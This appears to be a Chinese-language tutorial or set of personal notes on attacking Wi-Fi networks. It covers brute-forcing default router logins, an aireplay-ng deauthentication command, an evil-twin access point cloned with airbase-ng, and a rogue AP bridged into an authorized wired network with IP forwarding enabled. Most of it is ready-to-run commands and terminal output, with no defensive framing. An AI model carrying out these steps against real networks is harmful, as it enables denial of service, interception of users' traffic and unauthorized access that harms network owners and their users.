破解AP的默认账户
一些路由的管理web页面账户密码默认:admin,123456等等
即使并非如此一般其登录密码一般也较为简单,通过对网络抓包分析,编码对其进行暴力攻击。
迅捷家用路由器模拟登录页面测试
拒绝服务攻击
aireplay-ng -0 -a ap_mac -c vitim_mac wlan0mon
evil twin和AP MAC地址欺骗攻击
evil twin(克隆AP)攻击:在受攻击的WLAN网络附近部署攻击者控制的AP{相同的SSID,BSSID,chanel,freq}
root@yue:~# airbase-ng --help
Airbase-ng 1.5.2 - (C) 2008-2018 Thomas d'Otreppe
Original work: Martin Beck
https://www.aircrack-ng.org
usage: airbase-ng <options> <replay interface>
Options:
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to en-/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages)
-A : Ad-Hoc Mode (allows othe/ : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can't be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
-n hex : User specified ANonce when doing the 4-way handshake
Filter options:
--bssid MAC : BSSID to filter/use
--bssids file : read a list of BSSIDs out of that file
--client MAC : MAC of client to filter
--clients file : read a list of MACs out of that file
--essid ESSID : specify a single ESSID (default: default)
--essids file : read a list of ESSIDs out of that file
--help : Displays this usage screen
root@yue:~# airbase-ng -a C8:3A:35:A7:A6:50 --essid Tenda_A7A650 -c 13 wlan1mon
21:45:12 Created tap interface at0
21:45:12 Trying to set MTU on at0 to 1500
21:45:12 Access Point with BSSID C8:3A:35:A7:A6:50 started.
无赖AP
未经授权便链接到需要授权才能访问的网络的AP
在绝大多数的情况下,无赖AP都会设置为开放验证且不启用任何加密机制。
部署无赖AP
- 在授权网络内部部署实际的物理设备作为无赖AP。—>不仅会危害无线安全,还会危及需要授权网络的物理安全。
- 以软件方式创建无赖AP,并在其桥接至需要授权网络的本地以太网网络。
以软件方式搭建无赖AP
- 利用airbase-ng工具搭建AP
root@yue:~# airbase-ng -a AB:CD:EF:12:34:56 --essid ap_test -c 10 wlan1mon
16:32:23 Created tap interface at0
16:32:23 Trying to set MTU on at0 to 1500
16:32:23 Trying to set MTU on wlan1mon to 1800
ti_set_mac failed: Cannot assign requested address
You most probably want to set the MAC of your TAP interface.
ifconfig <iface> hw ether AB:CD:EF:12:34:56
16:32:23 Access Point with BSSID AB:CD:EF:12:34:56 started.
- 在需要授权网络一部分的以太网接口和无赖AP接口之间完成桥接。在Kali Linux下安装
bridge-utils
,并创建网络接口wifi_bridge:
root@yue:~# brctl addbr wifi_bridge
root@yue:~# iwconfig
wifi_bridge no wireless extensions.
at0 no wireless extensions.
eth0 no wireless extensions.
wlan1mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short long limit:2 RTS thr:off Fragment thr:off
Power Management:off
- 将以太网接口和airbase-ng工具创建的虚拟接口at0之间桥接
root@yue:~# brctl addif wifi_bridge eth0
root@yue:~# brctl addif wifi_bridge at0
- 激活at0与wifi_bridge接口
root@yue:~# ifconfig eth0 0.0.0.0 up
root@yue:~# ifconfig at0 0.0.0.0 up
- 激活端口转发功能
root@yue:~# echo 1 > /proc/sys/net/ipv4/ip_forward
okay…
激活网桥
root@yue:~# ifconfig wifi_bridge up
连接到无赖ap的无线客户端将会从需要授权的WLAN内的DHCP服务器接收IP地址